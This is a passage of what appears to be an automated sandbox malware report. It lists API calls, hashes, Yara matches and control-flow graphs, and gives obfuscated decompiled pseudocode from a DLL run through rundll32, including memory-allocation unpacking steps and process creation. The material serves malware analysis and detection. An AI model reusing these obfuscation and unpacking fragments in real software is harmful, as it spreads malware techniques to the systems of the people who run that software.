                                                                        0x10018a8f
                                                                        0x10018a94
                                                                        0x10018a99
                                                                        0x10018aa0
                                                                        0x10018aa7
                                                                        0x10018aae
                                                                        0x10018ab5
                                                                        0x10018abc
                                                                        0x10018ac3
                                                                        0x10018ace
                                                                        0x10018acf
                                                                        0x10018ad2
                                                                        0x10018ad9
                                                                        0x10018ae0
                                                                        0x10018ae4
                                                                        0x10018ae8
                                                                        0x10018aec
                                                                        0x10018af3
                                                                        0x10018afa
                                                                        0x10018b01
                                                                        0x10018b05
                                                                        0x10018b09
                                                                        0x10018b10
                                                                        0x10018b1c
                                                                        0x10018b1f
                                                                        0x10018b26
                                                                        0x10018b2d
                                                                        0x10018b34
                                                                        0x10018b3b
                                                                        0x10018b42
                                                                        0x10018b49
                                                                        0x10018b50
                                                                        0x10018b57
                                                                        0x10018b5e
                                                                        0x10018b65
                                                                        0x10018b70
                                                                        0x10018b75
                                                                        0x10018b82
                                                                        0x10018b85
                                                                        0x10018b86
                                                                        0x10018b89
                                                                        0x10018b90
                                                                        0x10018b97
                                                                        0x10018b9b
                                                                        0x10018ba2
                                                                        0x10018ba9
                                                                        0x10018bb4
                                                                        0x10018bb7
                                                                        0x10018bbe
                                                                        0x10018bcc
                                                                        0x10018bd1
                                                                        0x10018bd4
                                                                        0x10018bdb
                                                                        0x10018be2
                                                                        0x10018be6
                                                                        0x10018bf0
                                                                        0x10018bf3
                                                                        0x10018bf3
                                                                        0x10018bf6
                                                                        0x10018bf9
                                                                        0x10018c07
                                                                        0x10018c0f
                                                                        0x10018c12
                                                                        0x10018c1b
                                                                        0x10018c39
                                                                        0x10018c43
                                                                        0x10018c82
                                                                        0x10018c45
                                                                        0x10018c47
                                                                        0x10018c64
                                                                        0x10018c78
                                                                        0x10018c49
                                                                        0x10018c4c
                                                                        0x10018c4d
                                                                        0x10018c4e
                                                                        0x10018c4f
                                                                        0x10018c4f
                                                                        0x10018c52
                                                                        0x10018c52
                                                                        0x10018c8a

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID: I)F?
                                                                        • API String ID: 963392458-3766579322
                                                                        • Opcode ID: 9f0cb1b32e5b959dd6c64c6faedf6d3f6da1e1247f9cda7a21d2f129803ffcb6
                                                                        • Instruction ID: ef7d14b34603df108970e56650a302b1bb14d782bbbedb86e73a05816f7f5754
                                                                        • Opcode Fuzzy Hash: 9f0cb1b32e5b959dd6c64c6faedf6d3f6da1e1247f9cda7a21d2f129803ffcb6
                                                                        • Instruction Fuzzy Hash: 8681E172500248EBEF59CF65C9498CE3BB2FF44348F009219FE15962A0D7BAD999CF80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00260530, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00260575
                                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 00260625
                                                                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0026063F
                                                                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 00260770
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2113429450.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_240000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                        • String ID:
                                                                        • API String ID: 238919573-0
                                                                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction ID: 31790ce3754016f8116699ee82e94ef5c968b23598474c5d52d5f6bca523d49a
                                                                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction Fuzzy Hash: 91B1A8B4E00109DFCB48CF84C590AAEB7B5BF88304F248159E919AB345D735EE92DFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0025FF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 85 25ff50-25ff9b call 260360 88 25ff9d-25ffa7 call 260360 85->88 89 25ffaa-25ffda call 25fd30 VirtualAlloc 85->89 88->89
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0025FFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2113429450.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_240000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: VirtualAlloc
                                                                        • API String ID: 4275171209-164498762
                                                                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction ID: 7defab86f90389b497b00788d10df0f2df079a5aabeca69ae2a3e1f022344414
                                                                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction Fuzzy Hash: C4114260D082CDDEEF01D7E8C4097EFBFB55F11705F044098DA446B282D2BA57688BB6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001F2F9, Relevance: 1.6, APIs: 1, Instructions: 72processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 103 1001f2f9-1001f3e8 call 100056b2 call 100104d5 CreateProcessW
                                                                        C-Code - Quality: 30%
                                                                        			E1001F2F9(void* __edx, WCHAR* _a8, WCHAR* _a12, int _a16, struct _STARTUPINFOW* _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, struct _PROCESS_INFORMATION* _a56) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t64;
				signed int _t65;

				_push(_a56);
				_push(0);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(0);
				E100056B2(_t54);
				_v28 = 0x170c99;
				_v24 = 0;
				_v16 = 0x438d;
				_v16 = _v16 ^ 0x1c0fc040;
				_v16 = _v16 + 0xffffa13b;
				_v16 = _v16 ^ 0x1c0f1065;
				_v8 = 0x7b12;
				_v8 = _v8 + 0xe48b;
				_v8 = _v8 << 2;
				_t65 = 0x70;
				_push(0xf9b1620b);
				_v8 = _v8 * 0x77;
				_v8 = _v8 ^ 0x028dd8b4;
				_v20 = 0x8aa6;
				_v20 = _v20 + 0x376a;
				_v20 = _v20 ^ 0x0000ade9;
				_v12 = 0x19;
				_push(0x90aa198d);
				_v12 = _v12 / _t65;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x00005708;
				E100104D5(0x2ee, _v12 % _t65);
				_t64 = CreateProcessW(_a8, _a12, 0, 0, _a16, 0, 0, 0, _a20, _a56); // executed
				return _t64;
			}












                                                                        0x1001f300
                                                                        0x1001f305
                                                                        0x1001f306
                                                                        0x1001f307
                                                                        0x1001f30a
                                                                        0x1001f30d
                                                                        0x1001f310
                                                                        0x1001f311
                                                                        0x1001f314
                                                                        0x1001f317
                                                                        0x1001f31a
                                                                        0x1001f31d
                                                                        0x1001f320
                                                                        0x1001f323
                                                                        0x1001f325
                                                                        0x1001f326
                                                                        0x1001f32b
                                                                        0x1001f335
                                                                        0x1001f33a
                                                                        0x1001f341
                                                                        0x1001f348
                                                                        0x1001f34f
                                                                        0x1001f356
                                                                        0x1001f35d
                                                                        0x1001f364
                                                                        0x1001f36e
                                                                        0x1001f36f
                                                                        0x1001f377
                                                                        0x1001f37a
                                                                        0x1001f381
                                                                        0x1001f388
                                                                        0x1001f38f
                                                                        0x1001f396
                                                                        0x1001f3a2
                                                                        0x1001f3a7
                                                                        0x1001f3af
                                                                        0x1001f3b3
                                                                        0x1001f3c6
                                                                        0x1001f3e2
                                                                        0x1001f3e8

                                                                        APIs
                                                                        • CreateProcessW.KERNEL32(1C0F1065,0000ADE9,00000000,00000000,?,00000000,00000000,00000000,00170C99,?), ref: 1001F3E2
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: b82141c95acb57d60d751e5f2e4688589f7e44b0fc75a65c2ccc181fdfee9b76
                                                                        • Instruction ID: c1c344a82ab6e6d2027d32389277b6a1f50d48e74316109c084eae58ace878c9
                                                                        • Opcode Fuzzy Hash: b82141c95acb57d60d751e5f2e4688589f7e44b0fc75a65c2ccc181fdfee9b76
                                                                        • Instruction Fuzzy Hash: 0731E072901218FBDF11DEA5C90A8DFBFB5FF08354F108188F91866260D3B68A64EF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10001D54, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 108 10001d54-10001e12 call 100056b2 call 100104d5 SHGetFolderPathW
                                                                        APIs
                                                                        • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 10001E0C
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FolderPath
                                                                        • String ID:
                                                                        • API String ID: 1514166925-0
                                                                        • Opcode ID: 64456d9c3409b7dfc98e3926f3940d727050098de397692e26eff1ef2f8fc9ff
                                                                        • Instruction ID: 5bb8887445c1fcdc0dfe7db06e2ae0198e54bbb703149daf8052fb5d5ae5edad
                                                                        • Opcode Fuzzy Hash: 64456d9c3409b7dfc98e3926f3940d727050098de397692e26eff1ef2f8fc9ff
                                                                        • Instruction Fuzzy Hash: 7D213371D01218ABDF01DFE4CC4A8DEBFB4FB05314F108088F91466260D3799A60DB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000CD27, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 113 1000cd27-1000cdcf call 100104d5 ExitProcess
                                                                        C-Code - Quality: 39%
                                                                        			E1000CD27() {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _t48;

				_v20 = 0x9362;
				_v20 = _v20 << 3;
				_v20 = _v20 + 0x3ac5;
				_v20 = _v20 ^ 0x0004a93d;
				_v16 = 0x2d14;
				_v16 = _v16 | 0xd3f48c41;
				_v16 = _v16 >> 5;
				_v16 = _v16 ^ 0x069fac5e;
				_v12 = 0xc5b1;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0x469c37c1;
				_t48 = 0x70;
				_push(0xf9b1620b);
				_v12 = _v12 / _t48;
				_v12 = _v12 ^ 0x00a22cf4;
				_v8 = 0x5bb6;
				_v8 = _v8 >> 4;
				_v8 = _v8 | 0x6c69259f;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x0000087c;
				_push(0xa43506f8);
				E100104D5(0x16b, _v12 % _t48);
				ExitProcess(0);
			}








                                                                        0x1000cd2d
                                                                        0x1000cd36
                                                                        0x1000cd3a
                                                                        0x1000cd41
                                                                        0x1000cd48
                                                                        0x1000cd4f
                                                                        0x1000cd56
                                                                        0x1000cd5a
                                                                        0x1000cd61
                                                                        0x1000cd68
                                                                        0x1000cd6c
                                                                        0x1000cd78
                                                                        0x1000cd7b
                                                                        0x1000cd80
                                                                        0x1000cd86
                                                                        0x1000cd92
                                                                        0x1000cd99
                                                                        0x1000cd9d
                                                                        0x1000cda4
                                                                        0x1000cda8
                                                                        0x1000cdbb
                                                                        0x1000cdc0
                                                                        0x1000cdca

                                                                        APIs
                                                                        • ExitProcess.KERNEL32(00000000), ref: 1000CDCA
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: 095d61fac8955b0d745090151c9d232a6e8b83d7772360794bde9b1750a1fa0c
                                                                        • Instruction ID: fd49a0ddf446a10eaf2e1d98cea76079db48582c58eb1e4a99496c5128524e9f
                                                                        • Opcode Fuzzy Hash: 095d61fac8955b0d745090151c9d232a6e8b83d7772360794bde9b1750a1fa0c
                                                                        • Instruction Fuzzy Hash: 76112775E0060CEBEB48DFE8C84A59EBBB0FB00708F108599D526A7294C3B55B88DF81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000D867, Relevance: 1.3, APIs: 1, Instructions: 44stringCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 133 1000d867-1000d900 call 100056b2 call 100104d5 lstrcmpiW
                                                                        C-Code - Quality: 27%
                                                                        			E1000D867(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t32;
				int _t39;
				void* _t41;
				WCHAR* _t43;

				_push(_a16);
				_t43 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t32);
				_v20 = 0xc112;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x00187660;
				_v16 = 0x44a2;
				_v16 = _v16 << 0x10;
				_v16 = _v16 ^ 0x44a20c46;
				_v8 = 0x80d5;
				_v8 = _v8 << 6;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0x406aec0c;
				_v12 = 0x3c7d;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x000035cf;
				_push(0xf9b1620b);
				_push(0x903a0366);
				_t41 = 0x28;
				E100104D5(_t41, __edx);
				_t39 = lstrcmpiW(_a4, _t43); // executed
				return _t39;
			}











                                                                        0x1000d86e
                                                                        0x1000d871
                                                                        0x1000d873
                                                                        0x1000d876
                                                                        0x1000d879
                                                                        0x1000d87c
                                                                        0x1000d87d
                                                                        0x1000d87e
                                                                        0x1000d883
                                                                        0x1000d88d
                                                                        0x1000d891
                                                                        0x1000d898
                                                                        0x1000d89f
                                                                        0x1000d8a3
                                                                        0x1000d8aa
                                                                        0x1000d8b1
                                                                        0x1000d8b5
                                                                        0x1000d8b9
                                                                        0x1000d8c0
                                                                        0x1000d8c7
                                                                        0x1000d8cb
                                                                        0x1000d8de
                                                                        0x1000d8e6
                                                                        0x1000d8ed
                                                                        0x1000d8ee
                                                                        0x1000d8fa
                                                                        0x1000d900

                                                                        APIs
                                                                        • lstrcmpiW.KERNELBASE(000035CF,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000D8FA
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 1586166983-0
                                                                        • Opcode ID: 8f7063aac4a8c9182ba7432b9d57c55064d4a8a281301381b5e81462a188a855
                                                                        • Instruction ID: 8f5cadfe3fbd449c9d9c17bc6a6d8fcaa3f7433e09eb3b39b642844515f060d6
                                                                        • Opcode Fuzzy Hash: 8f7063aac4a8c9182ba7432b9d57c55064d4a8a281301381b5e81462a188a855
                                                                        • Instruction Fuzzy Hash: 29112376C01208BBEF41EFE4C90A8DEBBB4FB00354F108498E92566251D7B68B64DF81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 1000DC2F, Relevance: 43.6, Strings: 34, Instructions: 1094COMMONCrypto
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 166 1000dc2f-1000ef51 167 1000ef5c 166->167 168 1000ef61-1000ef63 167->168 169 1000ef69 168->169 170 1000f37b-1000f381 168->170 171 1000f340-1000f376 call 1000a176 call 1000164c 169->171 172 1000ef6f-1000ef75 169->172 173 1000f387 170->173 174 1000f5e9-1000f5ef 170->174 171->167 175 1000ef7b 172->175 176 1000f18e-1000f190 172->176 177 1000f38d-1000f393 173->177 178 1000f5df-1000f5e4 173->178 179 1000f5f5 174->179 180 1000f6ae-1000f6b4 174->180 182 1000ef81-1000ef87 175->182 183 1000f184-1000f189 175->183 186 1000f196 176->186 187 1000f27e-1000f284 176->187 184 1000f547-1000f54d 177->184 185 1000f399 177->185 178->168 188 1000f696-1000f6a9 179->188 189 1000f5fb-1000f601 179->189 190 1000f792-1000f7bd call 100091cd 180->190 191 1000f6ba-1000f6c0 180->191 193 1000f0f6-1000f0fc 182->193 194 1000ef8d 182->194 183->168 197 1000f553-1000f559 184->197 198 1000f7f8-1000f806 call 10009ae1 184->198 195 1000f52d-1000f542 call 1001b01e 185->195 196 1000f39f-1000f3a5 185->196 199 1000f7ea-1000f7f6 call 1000421e 186->199 200 1000f19c-1000f1a2 186->200 206 1000f28a-1000f290 187->206 207 1000f31e-1000f333 call 1001b3fe 187->207 188->167 201 1000f681-1000f691 189->201 202 1000f603-1000f609 189->202 258 1000f7c2 190->258 204 1000f6c2-1000f6c4 191->204 205 1000f71f-1000f78d call 100093fa call 1001d2cb call 1001c5f7 191->205 213 1000f160-1000f17f call 100089ba 193->213 214 1000f0fe-1000f104 193->214 215 1000f082-1000f0b8 call 1001db25 194->215 216 1000ef93-1000ef99 194->216 195->167 217 1000f517-1000f528 call 1000704b 196->217 218 1000f3ab-1000f3b1 196->218 219 1000f5c8-1000f5da call 1000f813 197->219 220 1000f55b-1000f561 197->220 235 1000f80b-1000f812 198->235 199->235 226 1000f1a8-1000f1ae 200->226 227 1000f24c-1000f271 call 100091cd 200->227 201->167 228 1000f655-1000f66f call 10018831 202->228 229 1000f60b-1000f611 202->229 221 1000f6c6-1000f6cc 204->221 222 1000f6e9-1000f71a call 1001231b 204->222 205->167 223 1000f292-1000f298 206->223 224 1000f2f9-1000f319 call 100155fa 206->224 207->235 289 1000f339-1000f33b 207->289 213->167 236 1000f106-1000f10c 214->236 237 1000f14d-1000f15b call 1001990e 214->237 293 1000f677-1000f67c 215->293 315 1000f0be-1000f0db call 100153a7 215->315 238 1000f068-1000f07d call 100193c9 216->238 239 1000ef9f-1000efa5 216->239 217->167 240 1000f3b7-1000f3bd 218->240 241 1000f45a-1000f48d call 10019dc0 218->241 219->167 242 1000f563-1000f569 220->242 243 1000f594-1000f5c3 call 1000607f 220->243 245 1000f6d2-1000f6e4 call 1000ca1d 221->245 246 1000f7c7-1000f7cd 221->246 222->167 248 1000f29a-1000f2a0 223->248 249 1000f2df-1000f2f4 call 1001b1d2 223->249 224->167 254 1000f1b0-1000f1b6 226->254 255 1000f224-1000f247 call 10006bc0 226->255 308 1000f274-1000f279 227->308 292 1000f671-1000f675 228->292 228->293 256 1000f613-1000f619 229->256 257 1000f629-1000f650 call 100091cd 229->257 263 1000f137-1000f148 call 100199a4 236->263 264 1000f10e-1000f114 236->264 237->167 238->167 278 1000efab-1000efb1 239->278 279 1000f04e-1000f063 call 10010f6d 239->279 265 1000f3fd-1000f423 call 10014e4b 240->265 266 1000f3bf-1000f3c5 240->266 322 1000f4ce-1000f512 call 10016536 call 1000607f 241->322 323 1000f48f-1000f4c9 call 1000607f 241->323 242->246 280 1000f56f-1000f584 call 1001992f 242->280 330 1000f1ec-1000f1f1 243->330 245->167 246->168 275 1000f7d3 246->275 248->246 283 1000f2a6-1000f2da call 10014693 248->283 249->167 273 1000f1f6-1000f204 call 10009cc8 254->273 274 1000f1b8-1000f1be 254->274 255->167 256->246 288 1000f61f-1000f624 256->288 257->167 258->246 263->167 264->246 294 1000f11a-1000f132 call 1000934c 264->294 336 1000f425-1000f455 call 1000d013 265->336 337 1000f3ec-1000f3f1 265->337 266->246 295 1000f3cb-1000f3ea call 1001e0d0 266->295 273->235 343 1000f20a-1000f21f call 100177b8 273->343 274->246 302 1000f1c4-1000f1e9 call 100091cd 274->302 275->235 305 1000f7d5-1000f7e8 call 1001edb9 278->305 306 1000efb7-1000efbd 278->306 279->167 280->235 345 1000f58a-1000f58f 280->345 283->167 288->168 289->167 292->293 293->167 294->167 295->337 348 1000f3f6-1000f3f8 295->348 302->330 305->235 327 1000f02f-1000f04c call 10015115 306->327 328 1000efbf-1000efc5 306->328 308->167 315->167 347 1000f0e1-1000f0f1 315->347 322->308 323->167 359 1000efff-1000f005 327->359 328->246 344 1000efcb-1000efe0 call 100137f4 328->344 330->167 336->167 337->167 343->167 361 1000efe2-1000eff9 call 1000164c 344->361 362 1000f00a-1000f02a call 1000164c 344->362 345->167 347->168 348->258 359->167 361->359 362->167
                                                                        C-Code - Quality: 97%
                                                                        			E1000DC2F() {
				char _v68;
				intOrPtr _v72;
				char _v80;
				char _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				void* _v112;
				intOrPtr _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v144;
				char _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				unsigned int _v180;
				unsigned int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				unsigned int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				unsigned int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				unsigned int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				unsigned int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				unsigned int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				unsigned int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				unsigned int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				unsigned int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				intOrPtr _t1166;
				intOrPtr _t1180;
				intOrPtr _t1220;
				intOrPtr _t1265;
				void* _t1272;
				void* _t1277;
				intOrPtr _t1278;
				intOrPtr _t1284;
				signed int _t1286;
				signed int _t1287;
				signed int _t1299;
				signed int _t1310;
				signed int _t1316;
				signed int _t1391;
				signed int _t1392;
				void* _t1397;
				signed int _t1399;
				signed int _t1400;
				signed int _t1401;
				signed int _t1402;
				signed int _t1403;
				signed int _t1404;
				signed int _t1405;
				signed int _t1406;
				signed int _t1407;
				signed int _t1408;
				signed int _t1409;
				signed int _t1410;
				signed int _t1411;
				signed int _t1412;
				signed int _t1413;
				signed int _t1414;
				signed int _t1415;
				signed int _t1416;
				signed int _t1417;
				signed int _t1418;
				signed int _t1419;
				signed int _t1424;
				signed int _t1428;
				void* _t1430;
				void* _t1431;
				void* _t1433;
				void* _t1434;
				void* _t1435;

				_t1430 = (_t1428 & 0xfffffff8) - 0x268;
				_v240 = 0xe54f;
				_v240 = _v240 << 1;
				_t1290 = 0x24211e99;
				_v240 = _v240 ^ 0x0001b603;
				_v400 = 0x34e4;
				_v400 = _v400 | 0x72f16b66;
				_v400 = _v400 ^ 0x4462d2ae;
				_v400 = _v400 ^ 0x36938c8e;
				_v616 = 0x6c80;
				_t1399 = 0x17;
				_v616 = _v616 / _t1399;
				_v616 = _v616 >> 0xa;
				_v616 = _v616 | 0xcaff16ad;
				_v616 = _v616 ^ 0xcaff08c2;
				_v408 = 0xd461;
				_v408 = _v408 + 0xffffc650;
				_v408 = _v408 | 0x218aa682;
				_v408 = _v408 ^ 0x218ad511;
				_v260 = 0x8324;
				_v260 = _v260 | 0xdae16db7;
				_v260 = _v260 ^ 0xdae19d23;
				_v520 = 0x4c7d;
				_v520 = _v520 + 0x6bb7;
				_v520 = _v520 << 8;
				_v520 = _v520 + 0xffffc4e4;
				_v520 = _v520 ^ 0x00b7ac0f;
				_v412 = 0xf31b;
				_v412 = _v412 << 4;
				_v412 = _v412 ^ 0x6d93368f;
				_v412 = _v412 ^ 0x6d9c5e6e;
				_v156 = 0xec47;
				_t1400 = 0x68;
				_v156 = _v156 / _t1400;
				_v156 = _v156 ^ 0x000075fd;
				_v324 = 0x34f8;
				_v324 = _v324 >> 5;
				_v324 = _v324 * 0x44;
				_v324 = _v324 ^ 0x00003473;
				_v448 = 0xeaa9;
				_v448 = _v448 | 0x4138ec1d;
				_v448 = _v448 + 0xffff51b1;
				_v448 = _v448 ^ 0x41382a1b;
				_v176 = 0x21c6;
				_v176 = _v176 | 0xc1f8d3e5;
				_v176 = _v176 ^ 0xc1f8e639;
				_v444 = 0xee7b;
				_v444 = _v444 >> 0xc;
				_v444 = _v444 + 0xf22d;
				_v444 = _v444 ^ 0x00008096;
				_v296 = 0xe06f;
				_v296 = _v296 << 1;
				_v296 = _v296 >> 6;
				_v296 = _v296 ^ 0x0000188b;
				_v292 = 0x5ebb;
				_v292 = _v292 + 0xffff9f3c;
				_v292 = _v292 ^ 0xffffc721;
				_v536 = 0x7dd7;
				_v536 = _v536 | 0xdd9aefff;
				_v536 = _v536 * 0x61;
				_v536 = _v536 ^ 0xf7ba9ffe;
				_v204 = 0x2ee2;
				_v204 = _v204 >> 6;
				_v204 = _v204 ^ 0x00004145;
				_v284 = 0xd043;
				_v284 = _v284 ^ 0xcd4d042e;
				_v284 = _v284 ^ 0xcd4dca10;
				_v248 = 0xa312;
				_v248 = _v248 | 0xf3ef4659;
				_v248 = _v248 ^ 0xf3efe95d;
				_v164 = 0x954d;
				_v164 = _v164 << 3;
				_v164 = _v164 ^ 0x0004c997;
				_v600 = 0xcdd0;
				_v600 = _v600 + 0xffffea33;
				_v600 = _v600 | 0xea8150e8;
				_t1401 = 0xa;
				_v600 = _v600 / _t1401;
				_v600 = _v600 ^ 0x177330cb;
